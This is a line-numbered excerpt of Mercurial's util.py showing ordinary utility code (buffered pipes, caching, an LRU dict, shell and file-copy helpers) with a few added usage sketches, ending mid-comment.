310 312 return memoryview(sliceable)[offset:offset + length]
311 313 return memoryview(sliceable)[offset:]
312 314
313 315 closefds = pycompat.osname == 'posix'
314 316
315 317 _chunksize = 4096
316 318
317 319 class bufferedinputpipe(object):
318 320 """a manually buffered input pipe
319 321
320 322 Python will not let us use buffered IO and lazy reading with 'polling' at
321 323 the same time. We cannot probe the buffer state and select will not detect
322 324 that data are ready to read if they are already buffered.
323 325
324 326 This class lets us work around that by implementing its own buffering
325 327 (allowing efficient readline) while offering a way to know if the buffer is
326 328 empty from the output (allowing collaboration of the buffer with polling).
327 329
328 330 This class lives in the 'util' module because it makes use of the 'os'
329 331 module from the python stdlib.
330 332 """
331 333
332 334 def __init__(self, input):
333 335 self._input = input
334 336 self._buffer = []
335 337 self._eof = False
336 338 self._lenbuf = 0
337 339
338 340 @property
339 341 def hasbuffer(self):
340 342 """True is any data is currently buffered
341 343
342 344 This will be used externally a pre-step for polling IO. If there is
343 345 already data then no polling should be set in place."""
344 346 return bool(self._buffer)
345 347
346 348 @property
347 349 def closed(self):
348 350 return self._input.closed
349 351
350 352 def fileno(self):
351 353 return self._input.fileno()
352 354
353 355 def close(self):
354 356 return self._input.close()
355 357
356 358 def read(self, size):
357 359 while (not self._eof) and (self._lenbuf < size):
358 360 self._fillbuffer()
359 361 return self._frombuffer(size)
360 362
361 363 def readline(self, *args, **kwargs):
362 364 if 1 < len(self._buffer):
363 365 # this should not happen because both read and readline end with a
364 366 # _frombuffer call that collapses it.
365 367 self._buffer = [''.join(self._buffer)]
366 368 self._lenbuf = len(self._buffer[0])
367 369 lfi = -1
368 370 if self._buffer:
369 371 lfi = self._buffer[-1].find('\n')
370 372 while (not self._eof) and lfi < 0:
371 373 self._fillbuffer()
372 374 if self._buffer:
373 375 lfi = self._buffer[-1].find('\n')
374 376 size = lfi + 1
375 377 if lfi < 0: # end of file
376 378 size = self._lenbuf
377 379 elif 1 < len(self._buffer):
378 380 # we need to take previous chunks into account
379 381 size += self._lenbuf - len(self._buffer[-1])
380 382 return self._frombuffer(size)
381 383
382 384 def _frombuffer(self, size):
383 385 """return at most 'size' data from the buffer
384 386
385 387 The data are removed from the buffer."""
386 388 if size == 0 or not self._buffer:
387 389 return ''
388 390 buf = self._buffer[0]
389 391 if 1 < len(self._buffer):
390 392 buf = ''.join(self._buffer)
391 393
392 394 data = buf[:size]
393 395 buf = buf[len(data):]
394 396 if buf:
395 397 self._buffer = [buf]
396 398 self._lenbuf = len(buf)
397 399 else:
398 400 self._buffer = []
399 401 self._lenbuf = 0
400 402 return data
401 403
402 404 def _fillbuffer(self):
403 405 """read data to the buffer"""
404 406 data = os.read(self._input.fileno(), _chunksize)
405 407 if not data:
406 408 self._eof = True
407 409 else:
408 410 self._lenbuf += len(data)
409 411 self._buffer.append(data)
410 412
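A minimal sketch (not part of the changeset) of the intended collaboration between the buffer and polling, with hasbuffer as the "don't poll, data is already here" signal; it assumes Python 2, matching this module's native-str internals:

    import os
    import select

    rfd, wfd = os.pipe()
    os.write(wfd, b'one\ntwo\n')
    pipe = bufferedinputpipe(os.fdopen(rfd, 'rb'))

    assert pipe.readline() == b'one\n'
    # 'two\n' is already buffered, so hasbuffer tells us to skip polling;
    # select() would not report the fd as readable for buffered data.
    if not pipe.hasbuffer:
        select.select([pipe.fileno()], [], [])
    assert pipe.readline() == b'two\n'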
411 413 def mmapread(fp):
412 414 try:
413 415 fd = getattr(fp, 'fileno', lambda: fp)()
414 416 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 417 except ValueError:
416 418 # Empty files cannot be mmapped, but mmapread should still work. Check
417 419 # if the file is empty, and if so, return an empty buffer.
418 420 if os.fstat(fd).st_size == 0:
419 421 return ''
420 422 raise
421 423
422 424 def popen2(cmd, env=None, newlines=False):
423 425 # Setting bufsize to -1 lets the system decide the buffer size.
424 426 # The default for bufsize is 0, meaning unbuffered. This leads to
425 427 # poor performance on Mac OS X: http://bugs.python.org/issue4194
426 428 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
427 429 close_fds=closefds,
428 430 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 431 universal_newlines=newlines,
430 432 env=env)
431 433 return p.stdin, p.stdout
432 434
433 435 def popen3(cmd, env=None, newlines=False):
434 436 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
435 437 return stdin, stdout, stderr
436 438
437 439 def popen4(cmd, env=None, newlines=False, bufsize=-1):
438 440 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
439 441 close_fds=closefds,
440 442 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
441 443 stderr=subprocess.PIPE,
442 444 universal_newlines=newlines,
443 445 env=env)
444 446 return p.stdin, p.stdout, p.stderr, p
445 447
446 448 def version():
447 449 """Return version information if available."""
448 450 try:
449 451 from . import __version__
450 452 return __version__.version
451 453 except ImportError:
452 454 return 'unknown'
453 455
454 456 def versiontuple(v=None, n=4):
455 457 """Parses a Mercurial version string into an N-tuple.
456 458
457 459 The version string to be parsed is specified with the ``v`` argument.
458 460 If it isn't defined, the current Mercurial version string will be parsed.
459 461
460 462 ``n`` can be 2, 3, or 4. Here is how some version strings map to
461 463 returned values:
462 464
463 465 >>> v = b'3.6.1+190-df9b73d2d444'
464 466 >>> versiontuple(v, 2)
465 467 (3, 6)
466 468 >>> versiontuple(v, 3)
467 469 (3, 6, 1)
468 470 >>> versiontuple(v, 4)
469 471 (3, 6, 1, '190-df9b73d2d444')
470 472
471 473 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
472 474 (3, 6, 1, '190-df9b73d2d444+20151118')
473 475
474 476 >>> v = b'3.6'
475 477 >>> versiontuple(v, 2)
476 478 (3, 6)
477 479 >>> versiontuple(v, 3)
478 480 (3, 6, None)
479 481 >>> versiontuple(v, 4)
480 482 (3, 6, None, None)
481 483
482 484 >>> v = b'3.9-rc'
483 485 >>> versiontuple(v, 2)
484 486 (3, 9)
485 487 >>> versiontuple(v, 3)
486 488 (3, 9, None)
487 489 >>> versiontuple(v, 4)
488 490 (3, 9, None, 'rc')
489 491
490 492 >>> v = b'3.9-rc+2-02a8fea4289b'
491 493 >>> versiontuple(v, 2)
492 494 (3, 9)
493 495 >>> versiontuple(v, 3)
494 496 (3, 9, None)
495 497 >>> versiontuple(v, 4)
496 498 (3, 9, None, 'rc+2-02a8fea4289b')
497 499 """
498 500 if not v:
499 501 v = version()
500 502 parts = remod.split('[\+-]', v, 1)
501 503 if len(parts) == 1:
502 504 vparts, extra = parts[0], None
503 505 else:
504 506 vparts, extra = parts
505 507
506 508 vints = []
507 509 for i in vparts.split('.'):
508 510 try:
509 511 vints.append(int(i))
510 512 except ValueError:
511 513 break
512 514 # (3, 6) -> (3, 6, None)
513 515 while len(vints) < 3:
514 516 vints.append(None)
515 517
516 518 if n == 2:
517 519 return (vints[0], vints[1])
518 520 if n == 3:
519 521 return (vints[0], vints[1], vints[2])
520 522 if n == 4:
521 523 return (vints[0], vints[1], vints[2], extra)
522 524
523 525 # used by parsedate
524 526 defaultdateformats = (
525 527 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
526 528 '%Y-%m-%dT%H:%M', # without seconds
527 529 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
528 530 '%Y-%m-%dT%H%M', # without seconds
529 531 '%Y-%m-%d %H:%M:%S', # our common legal variant
530 532 '%Y-%m-%d %H:%M', # without seconds
531 533 '%Y-%m-%d %H%M%S', # without :
532 534 '%Y-%m-%d %H%M', # without seconds
533 535 '%Y-%m-%d %I:%M:%S%p',
534 536 '%Y-%m-%d %H:%M',
535 537 '%Y-%m-%d %I:%M%p',
536 538 '%Y-%m-%d',
537 539 '%m-%d',
538 540 '%m/%d',
539 541 '%m/%d/%y',
540 542 '%m/%d/%Y',
541 543 '%a %b %d %H:%M:%S %Y',
542 544 '%a %b %d %I:%M:%S%p %Y',
543 545 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
544 546 '%b %d %H:%M:%S %Y',
545 547 '%b %d %I:%M:%S%p %Y',
546 548 '%b %d %H:%M:%S',
547 549 '%b %d %I:%M:%S%p',
548 550 '%b %d %H:%M',
549 551 '%b %d %I:%M%p',
550 552 '%b %d %Y',
551 553 '%b %d',
552 554 '%H:%M:%S',
553 555 '%I:%M:%S%p',
554 556 '%H:%M',
555 557 '%I:%M%p',
556 558 )
557 559
558 560 extendeddateformats = defaultdateformats + (
559 561 "%Y",
560 562 "%Y-%m",
561 563 "%b",
562 564 "%b %Y",
563 565 )
564 566
565 567 def cachefunc(func):
566 568 '''cache the result of function calls'''
567 569 # XXX doesn't handle keywords args
568 570 if func.__code__.co_argcount == 0:
569 571 cache = []
570 572 def f():
571 573 if len(cache) == 0:
572 574 cache.append(func())
573 575 return cache[0]
574 576 return f
575 577 cache = {}
576 578 if func.__code__.co_argcount == 1:
577 579 # we gain a small amount of time because
578 580 # we don't need to pack/unpack the list
579 581 def f(arg):
580 582 if arg not in cache:
581 583 cache[arg] = func(arg)
582 584 return cache[arg]
583 585 else:
584 586 def f(*args):
585 587 if args not in cache:
586 588 cache[args] = func(*args)
587 589 return cache[args]
588 590
589 591 return f
590 592
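A minimal sketch (not part of the changeset) of the memoization contract; as the XXX above notes, only positional arguments participate in the cache key:

    calls = []
    def square(x):
        calls.append(x)
        return x * x

    fastsquare = cachefunc(square)
    assert fastsquare(3) == 9
    assert fastsquare(3) == 9     # second call is served from the cache
    assert calls == [3]           # the wrapped function ran exactly once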
591 593 class cow(object):
592 594 """helper class to make copy-on-write easier
593 595
594 596 Call preparewrite before doing any writes.
595 597 """
596 598
597 599 def preparewrite(self):
598 600 """call this before writes, return self or a copied new object"""
599 601 if getattr(self, '_copied', 0):
600 602 self._copied -= 1
601 603 return self.__class__(self)
602 604 return self
603 605
604 606 def copy(self):
605 607 """always do a cheap copy"""
606 608 self._copied = getattr(self, '_copied', 0) + 1
607 609 return self
608 610
609 611 class sortdict(collections.OrderedDict):
610 612 '''a simple sorted dictionary
611 613
612 614 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
613 615 >>> d2 = d1.copy()
614 616 >>> d2
615 617 sortdict([('a', 0), ('b', 1)])
616 618 >>> d2.update([(b'a', 2)])
617 619 >>> list(d2.keys()) # should still be in last-set order
618 620 ['b', 'a']
619 621 '''
620 622
621 623 def __setitem__(self, key, value):
622 624 if key in self:
623 625 del self[key]
624 626 super(sortdict, self).__setitem__(key, value)
625 627
626 628 if pycompat.ispypy:
627 629 # __setitem__() isn't called as of PyPy 5.8.0
628 630 def update(self, src):
629 631 if isinstance(src, dict):
630 632 src = src.iteritems()
631 633 for k, v in src:
632 634 self[k] = v
633 635
634 636 class cowdict(cow, dict):
635 637 """copy-on-write dict
636 638
637 639 Be sure to call d = d.preparewrite() before writing to d.
638 640
639 641 >>> a = cowdict()
640 642 >>> a is a.preparewrite()
641 643 True
642 644 >>> b = a.copy()
643 645 >>> b is a
644 646 True
645 647 >>> c = b.copy()
646 648 >>> c is a
647 649 True
648 650 >>> a = a.preparewrite()
649 651 >>> b is a
650 652 False
651 653 >>> a is a.preparewrite()
652 654 True
653 655 >>> c = c.preparewrite()
654 656 >>> b is c
655 657 False
656 658 >>> b is b.preparewrite()
657 659 True
658 660 """
659 661
660 662 class cowsortdict(cow, sortdict):
661 663 """copy-on-write sortdict
662 664
663 665 Be sure to call d = d.preparewrite() before writing to d.
664 666 """
665 667
666 668 class transactional(object):
667 669 """Base class for making a transactional type into a context manager."""
668 670 __metaclass__ = abc.ABCMeta
669 671
670 672 @abc.abstractmethod
671 673 def close(self):
672 674 """Successfully closes the transaction."""
673 675
674 676 @abc.abstractmethod
675 677 def release(self):
676 678 """Marks the end of the transaction.
677 679
678 680 If the transaction has not been closed, it will be aborted.
679 681 """
680 682
681 683 def __enter__(self):
682 684 return self
683 685
684 686 def __exit__(self, exc_type, exc_val, exc_tb):
685 687 try:
686 688 if exc_type is None:
687 689 self.close()
688 690 finally:
689 691 self.release()
690 692
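A minimal sketch (not part of the changeset) of the context-manager contract: close() runs only when the body succeeds, while release() always runs. The demotxn subclass is hypothetical:

    class demotxn(transactional):
        def __init__(self):
            self.events = []
        def close(self):
            self.events.append('close')
        def release(self):
            self.events.append('release')

    t = demotxn()
    with t:
        pass
    assert t.events == ['close', 'release']

    t = demotxn()
    try:
        with t:
            raise RuntimeError('boom')
    except RuntimeError:
        pass
    assert t.events == ['release']   # aborted: close() was skipped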
691 693 @contextlib.contextmanager
692 694 def acceptintervention(tr=None):
693 695 """A context manager that closes the transaction on InterventionRequired
694 696
695 697 If no transaction was provided, this simply runs the body and returns
696 698 """
697 699 if not tr:
698 700 yield
699 701 return
700 702 try:
701 703 yield
702 704 tr.close()
703 705 except error.InterventionRequired:
704 706 tr.close()
705 707 raise
706 708 finally:
707 709 tr.release()
708 710
709 711 @contextlib.contextmanager
710 712 def nullcontextmanager():
711 713 yield
712 714
713 715 class _lrucachenode(object):
714 716 """A node in a doubly linked list.
715 717
716 718 Holds a reference to nodes on either side as well as a key-value
717 719 pair for the dictionary entry.
718 720 """
719 721 __slots__ = (u'next', u'prev', u'key', u'value')
720 722
721 723 def __init__(self):
722 724 self.next = None
723 725 self.prev = None
724 726
725 727 self.key = _notset
726 728 self.value = None
727 729
728 730 def markempty(self):
729 731 """Mark the node as emptied."""
730 732 self.key = _notset
731 733
732 734 class lrucachedict(object):
733 735 """Dict that caches most recent accesses and sets.
734 736
735 737 The dict consists of an actual backing dict - indexed by original
736 738 key - and a doubly linked circular list defining the order of entries in
737 739 the cache.
738 740
739 741 The head node is the newest entry in the cache. If the cache is full,
740 742 we recycle head.prev and make it the new head. Cache accesses result in
741 743 the node being moved to before the existing head and being marked as the
742 744 new head node.
743 745 """
744 746 def __init__(self, max):
745 747 self._cache = {}
746 748
747 749 self._head = head = _lrucachenode()
748 750 head.prev = head
749 751 head.next = head
750 752 self._size = 1
751 753 self._capacity = max
752 754
753 755 def __len__(self):
754 756 return len(self._cache)
755 757
756 758 def __contains__(self, k):
757 759 return k in self._cache
758 760
759 761 def __iter__(self):
760 762 # We don't have to iterate in cache order, but why not.
761 763 n = self._head
762 764 for i in range(len(self._cache)):
763 765 yield n.key
764 766 n = n.next
765 767
766 768 def __getitem__(self, k):
767 769 node = self._cache[k]
768 770 self._movetohead(node)
769 771 return node.value
770 772
771 773 def __setitem__(self, k, v):
772 774 node = self._cache.get(k)
773 775 # Replace existing value and mark as newest.
774 776 if node is not None:
775 777 node.value = v
776 778 self._movetohead(node)
777 779 return
778 780
779 781 if self._size < self._capacity:
780 782 node = self._addcapacity()
781 783 else:
782 784 # Grab the last/oldest item.
783 785 node = self._head.prev
784 786
785 787 # At capacity. Kill the old entry.
786 788 if node.key is not _notset:
787 789 del self._cache[node.key]
788 790
789 791 node.key = k
790 792 node.value = v
791 793 self._cache[k] = node
792 794 # And mark it as newest entry. No need to adjust order since it
793 795 # is already self._head.prev.
794 796 self._head = node
795 797
796 798 def __delitem__(self, k):
797 799 node = self._cache.pop(k)
798 800 node.markempty()
799 801
800 802 # Temporarily mark as newest item before re-adjusting head to make
801 803 # this node the oldest item.
802 804 self._movetohead(node)
803 805 self._head = node.next
804 806
805 807 # Additional dict methods.
806 808
807 809 def get(self, k, default=None):
808 810 try:
809 811 return self._cache[k].value
810 812 except KeyError:
811 813 return default
812 814
813 815 def clear(self):
814 816 n = self._head
815 817 while n.key is not _notset:
816 818 n.markempty()
817 819 n = n.next
818 820
819 821 self._cache.clear()
820 822
821 823 def copy(self):
822 824 result = lrucachedict(self._capacity)
823 825 n = self._head.prev
824 826 # Iterate in oldest-to-newest order, so the copy has the right ordering
825 827 for i in range(len(self._cache)):
826 828 result[n.key] = n.value
827 829 n = n.prev
828 830 return result
829 831
830 832 def _movetohead(self, node):
831 833 """Mark a node as the newest, making it the new head.
832 834
833 835 When a node is accessed, it becomes the freshest entry in the LRU
834 836 list, which is denoted by self._head.
835 837
836 838 Visually, let's make ``N`` the new head node (* denotes head):
837 839
838 840 previous/oldest <-> head <-> next/next newest
839 841
840 842 ----<->--- A* ---<->-----
841 843 | |
842 844 E <-> D <-> N <-> C <-> B
843 845
844 846 To:
845 847
846 848 ----<->--- N* ---<->-----
847 849 | |
848 850 E <-> D <-> C <-> B <-> A
849 851
850 852 This requires the following moves:
851 853
852 854 C.next = D (node.prev.next = node.next)
853 855 D.prev = C (node.next.prev = node.prev)
854 856 E.next = N (head.prev.next = node)
855 857 N.prev = E (node.prev = head.prev)
856 858 N.next = A (node.next = head)
857 859 A.prev = N (head.prev = node)
858 860 """
859 861 head = self._head
860 862 # C.next = D
861 863 node.prev.next = node.next
862 864 # D.prev = C
863 865 node.next.prev = node.prev
864 866 # N.prev = E
865 867 node.prev = head.prev
866 868 # N.next = A
867 869 # It is tempting to do just "head" here; however, if node is
868 870 # adjacent to head, this will do bad things.
869 871 node.next = head.prev.next
870 872 # E.next = N
871 873 node.next.prev = node
872 874 # A.prev = N
873 875 node.prev.next = node
874 876
875 877 self._head = node
876 878
877 879 def _addcapacity(self):
878 880 """Add a node to the circular linked list.
879 881
880 882 The new node is inserted before the head node.
881 883 """
882 884 head = self._head
883 885 node = _lrucachenode()
884 886 head.prev.next = node
885 887 node.prev = head.prev
886 888 node.next = head
887 889 head.prev = node
888 890 self._size += 1
889 891 return node
890 892
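A minimal sketch (not part of the changeset) of the eviction behavior that the _movetohead() diagram above describes:

    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']                  # refreshes 'a', so 'b' becomes the oldest node
    d['c'] = 3              # at capacity: inserting 'c' recycles 'b''s node
    assert 'b' not in d
    assert d.get('a') == 1 and d.get('c') == 3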
891 893 def lrucachefunc(func):
892 894 '''cache most recent results of function calls'''
893 895 cache = {}
894 896 order = collections.deque()
895 897 if func.__code__.co_argcount == 1:
896 898 def f(arg):
897 899 if arg not in cache:
898 900 if len(cache) > 20:
899 901 del cache[order.popleft()]
900 902 cache[arg] = func(arg)
901 903 else:
902 904 order.remove(arg)
903 905 order.append(arg)
904 906 return cache[arg]
905 907 else:
906 908 def f(*args):
907 909 if args not in cache:
908 910 if len(cache) > 20:
909 911 del cache[order.popleft()]
910 912 cache[args] = func(*args)
911 913 else:
912 914 order.remove(args)
913 915 order.append(args)
914 916 return cache[args]
915 917
916 918 return f
917 919
918 920 class propertycache(object):
919 921 def __init__(self, func):
920 922 self.func = func
921 923 self.name = func.__name__
922 924 def __get__(self, obj, type=None):
923 925 result = self.func(obj)
924 926 self.cachevalue(obj, result)
925 927 return result
926 928
927 929 def cachevalue(self, obj, value):
928 930 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
929 931 obj.__dict__[self.name] = value
930 932
931 933 def pipefilter(s, cmd):
932 934 '''filter string S through command CMD, returning its output'''
933 935 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
934 936 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
935 937 pout, perr = p.communicate(s)
936 938 return pout
937 939
938 940 def tempfilter(s, cmd):
939 941 '''filter string S through a pair of temporary files with CMD.
940 942 CMD is used as a template to create the real command to be run,
941 943 with the strings INFILE and OUTFILE replaced by the real names of
942 944 the temporary files generated.'''
943 945 inname, outname = None, None
944 946 try:
945 947 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
946 948 fp = os.fdopen(infd, pycompat.sysstr('wb'))
947 949 fp.write(s)
948 950 fp.close()
949 951 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
950 952 os.close(outfd)
951 953 cmd = cmd.replace('INFILE', inname)
952 954 cmd = cmd.replace('OUTFILE', outname)
953 955 code = os.system(cmd)
954 956 if pycompat.sysplatform == 'OpenVMS' and code & 1:
955 957 code = 0
956 958 if code:
957 959 raise Abort(_("command '%s' failed: %s") %
958 960 (cmd, explainexit(code)))
959 961 return readfile(outname)
960 962 finally:
961 963 try:
962 964 if inname:
963 965 os.unlink(inname)
964 966 except OSError:
965 967 pass
966 968 try:
967 969 if outname:
968 970 os.unlink(outname)
969 971 except OSError:
970 972 pass
971 973
972 974 filtertable = {
973 975 'tempfile:': tempfilter,
974 976 'pipe:': pipefilter,
975 977 }
976 978
977 979 def filter(s, cmd):
978 980 "filter a string through a command that transforms its input to its output"
979 981 for name, fn in filtertable.iteritems():
980 982 if cmd.startswith(name):
981 983 return fn(s, cmd[len(name):].lstrip())
982 984 return pipefilter(s, cmd)
983 985
984 986 def binary(s):
985 987 """return true if a string is binary data"""
986 988 return bool(s and '\0' in s)
987 989
988 990 def increasingchunks(source, min=1024, max=65536):
989 991 '''return no less than min bytes per chunk while data remains,
990 992 doubling min after each chunk until it reaches max'''
991 993 def log2(x):
992 994 if not x:
993 995 return 0
994 996 i = 0
995 997 while x:
996 998 x >>= 1
997 999 i += 1
998 1000 return i - 1
999 1001
1000 1002 buf = []
1001 1003 blen = 0
1002 1004 for chunk in source:
1003 1005 buf.append(chunk)
1004 1006 blen += len(chunk)
1005 1007 if blen >= min:
1006 1008 if min < max:
1007 1009 min = min << 1
1008 1010 nmin = 1 << log2(blen)
1009 1011 if nmin > min:
1010 1012 min = nmin
1011 1013 if min > max:
1012 1014 min = max
1013 1015 yield ''.join(buf)
1014 1016 blen = 0
1015 1017 buf = []
1016 1018 if buf:
1017 1019 yield ''.join(buf)
1018 1020
1019 1021 Abort = error.Abort
1020 1022
1021 1023 def always(fn):
1022 1024 return True
1023 1025
1024 1026 def never(fn):
1025 1027 return False
1026 1028
1027 1029 def nogc(func):
1028 1030 """disable garbage collector
1029 1031
1030 1032 Python's garbage collector triggers a GC each time a certain number of
1031 1033 container objects (the number being defined by gc.get_threshold()) are
1032 1034 allocated even when marked not to be tracked by the collector. Tracking has
1033 1035 no effect on when GCs are triggered, only on what objects the GC looks
1034 1036 into. As a workaround, disable GC while building complex (huge)
1035 1037 containers.
1036 1038
1037 1039 This garbage collector issue has been fixed in 2.7, but it still affects
1038 1040 CPython's performance.
1039 1041 """
1040 1042 def wrapper(*args, **kwargs):
1041 1043 gcenabled = gc.isenabled()
1042 1044 gc.disable()
1043 1045 try:
1044 1046 return func(*args, **kwargs)
1045 1047 finally:
1046 1048 if gcenabled:
1047 1049 gc.enable()
1048 1050 return wrapper
1049 1051
1050 1052 if pycompat.ispypy:
1051 1053 # PyPy runs slower with gc disabled
1052 1054 nogc = lambda x: x
1053 1055
1054 1056 def pathto(root, n1, n2):
1055 1057 '''return the relative path from one place to another.
1056 1058 root should use os.sep to separate directories
1057 1059 n1 should use os.sep to separate directories
1058 1060 n2 should use "/" to separate directories
1059 1061 returns an os.sep-separated path.
1060 1062
1061 1063 If n1 is a relative path, it's assumed it's
1062 1064 relative to root.
1063 1065 n2 should always be relative to root.
1064 1066 '''
1065 1067 if not n1:
1066 1068 return localpath(n2)
1067 1069 if os.path.isabs(n1):
1068 1070 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1069 1071 return os.path.join(root, localpath(n2))
1070 1072 n2 = '/'.join((pconvert(root), n2))
1071 1073 a, b = splitpath(n1), n2.split('/')
1072 1074 a.reverse()
1073 1075 b.reverse()
1074 1076 while a and b and a[-1] == b[-1]:
1075 1077 a.pop()
1076 1078 b.pop()
1077 1079 b.reverse()
1078 1080 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1079 1081
1080 1082 def mainfrozen():
1081 1083 """return True if we are a frozen executable.
1082 1084
1083 1085 The code supports py2exe (most common, Windows only) and tools/freeze
1084 1086 (portable, not much used).
1085 1087 """
1086 1088 return (safehasattr(sys, "frozen") or # new py2exe
1087 1089 safehasattr(sys, "importers") or # old py2exe
1088 1090 imp.is_frozen(u"__main__")) # tools/freeze
1089 1091
1090 1092 # the location of data files matching the source code
1091 1093 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1092 1094 # executable version (py2exe) doesn't support __file__
1093 1095 datapath = os.path.dirname(pycompat.sysexecutable)
1094 1096 else:
1095 1097 datapath = os.path.dirname(pycompat.fsencode(__file__))
1096 1098
1097 1099 i18n.setdatapath(datapath)
1098 1100
1099 1101 _hgexecutable = None
1100 1102
1101 1103 def hgexecutable():
1102 1104 """return location of the 'hg' executable.
1103 1105
1104 1106 Defaults to $HG or 'hg' in the search path.
1105 1107 """
1106 1108 if _hgexecutable is None:
1107 1109 hg = encoding.environ.get('HG')
1108 1110 mainmod = sys.modules[pycompat.sysstr('__main__')]
1109 1111 if hg:
1110 1112 _sethgexecutable(hg)
1111 1113 elif mainfrozen():
1112 1114 if getattr(sys, 'frozen', None) == 'macosx_app':
1113 1115 # Env variable set by py2app
1114 1116 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1115 1117 else:
1116 1118 _sethgexecutable(pycompat.sysexecutable)
1117 1119 elif (os.path.basename(
1118 1120 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1119 1121 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1120 1122 else:
1121 1123 exe = findexe('hg') or os.path.basename(sys.argv[0])
1122 1124 _sethgexecutable(exe)
1123 1125 return _hgexecutable
1124 1126
1125 1127 def _sethgexecutable(path):
1126 1128 """set location of the 'hg' executable"""
1127 1129 global _hgexecutable
1128 1130 _hgexecutable = path
1129 1131
1130 1132 def _isstdout(f):
1131 1133 fileno = getattr(f, 'fileno', None)
1132 1134 return fileno and fileno() == sys.__stdout__.fileno()
1133 1135
1134 1136 def shellenviron(environ=None):
1135 1137 """return environ with optional override, useful for shelling out"""
1136 1138 def py2shell(val):
1137 1139 'convert python object into string that is useful to shell'
1138 1140 if val is None or val is False:
1139 1141 return '0'
1140 1142 if val is True:
1141 1143 return '1'
1142 1144 return str(val)
1143 1145 env = dict(encoding.environ)
1144 1146 if environ:
1145 1147 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1146 1148 env['HG'] = hgexecutable()
1147 1149 return env
1148 1150
1149 1151 def system(cmd, environ=None, cwd=None, out=None):
1150 1152 '''enhanced shell command execution.
1151 1153 run with environment maybe modified, maybe in different dir.
1152 1154
1153 1155 if out is specified, it is assumed to be a file-like object that has a
1154 1156 write() method. stdout and stderr will be redirected to out.'''
1155 1157 try:
1156 1158 stdout.flush()
1157 1159 except Exception:
1158 1160 pass
1159 1161 cmd = quotecommand(cmd)
1160 1162 env = shellenviron(environ)
1161 1163 if out is None or _isstdout(out):
1162 1164 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1163 1165 env=env, cwd=cwd)
1164 1166 else:
1165 1167 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1166 1168 env=env, cwd=cwd, stdout=subprocess.PIPE,
1167 1169 stderr=subprocess.STDOUT)
1168 1170 for line in iter(proc.stdout.readline, ''):
1169 1171 out.write(line)
1170 1172 proc.wait()
1171 1173 rc = proc.returncode
1172 1174 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1173 1175 rc = 0
1174 1176 return rc
1175 1177
1176 1178 def checksignature(func):
1177 1179 '''wrap a function with code to check for calling errors'''
1178 1180 def check(*args, **kwargs):
1179 1181 try:
1180 1182 return func(*args, **kwargs)
1181 1183 except TypeError:
1182 1184 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1183 1185 raise error.SignatureError
1184 1186 raise
1185 1187
1186 1188 return check
1187 1189
1188 1190 # a whitelist of known filesystems where hardlink works reliably
1189 1191 _hardlinkfswhitelist = {
1190 1192 'btrfs',
1191 1193 'ext2',
1192 1194 'ext3',
1193 1195 'ext4',
1194 1196 'hfs',
1195 1197 'jfs',
1196 1198 'reiserfs',
1197 1199 'tmpfs',
1198 1200 'ufs',
1199 1201 'xfs',
1200 1202 'zfs',
1201 1203 }
1202 1204
1203 1205 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1204 1206 '''copy a file, preserving mode and optionally other stat info like
1205 1207 atime/mtime
1206 1208
1207 1209 checkambig argument is used with filestat, and is useful only if
1208 1210 destination file is guarded by any lock (e.g. repo.lock or
1209 1211 repo.wlock).
1210 1212
1211 1213 copystat and checkambig should be exclusive.
1212 1214 '''
1213 1215 assert not (copystat and checkambig)
1214 1216 oldstat = None
1215 1217 if os.path.lexists(dest):
1216 1218 if checkambig:
1217 1219 oldstat = checkambig and filestat.frompath(dest)
1218 1220 unlink(dest)
1219 1221 if hardlink:
1220 1222 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1221 1223 # unless we are confident that dest is on a whitelisted filesystem.
1222 1224 try:
1223 1225 fstype = getfstype(os.path.dirname(dest))
1224 1226 except OSError:
1225 1227 fstype = None
1226 1228 if fstype not in _hardlinkfswhitelist:
1227 1229 hardlink = False
1228 1230 if hardlink:
1229 1231 try:
1230 1232 oslink(src, dest)
1231 1233 return
1232 1234 except (IOError, OSError):
1233 1235 pass # fall back to normal copy
1234 1236 if os.path.islink(src):
1235 1237 os.symlink(os.readlink(src), dest)
1236 1238 # copytime is ignored for symlinks, but in general copytime isn't needed
1237 1239 # for them anyway
1238 1240 else:
1239 1241 try:
1240 1242 shutil.copyfile(src, dest)
1241 1243 if copystat:
1242 1244 # copystat also copies mode
1243 1245 shutil.copystat(src, dest)
1244 1246 else:
1245 1247 shutil.copymode(src, dest)
1246 1248 if oldstat and oldstat.stat:
1247 1249 newstat = filestat.frompath(dest)
1248 1250 if newstat.isambig(oldstat):
1249 1251 # stat of copied file is ambiguous to original one
1250 1252 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1251 1253 os.utime(dest, (advanced, advanced))
1252 1254 except shutil.Error as inst:
1253 1255 raise Abort(str(inst))
1254 1256
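# Illustrative use of copyfile (paths are hypothetical): hardlinking is
# attempted only when the destination filesystem is in the whitelist
# above, and quietly falls back to a real copy on failure:
#
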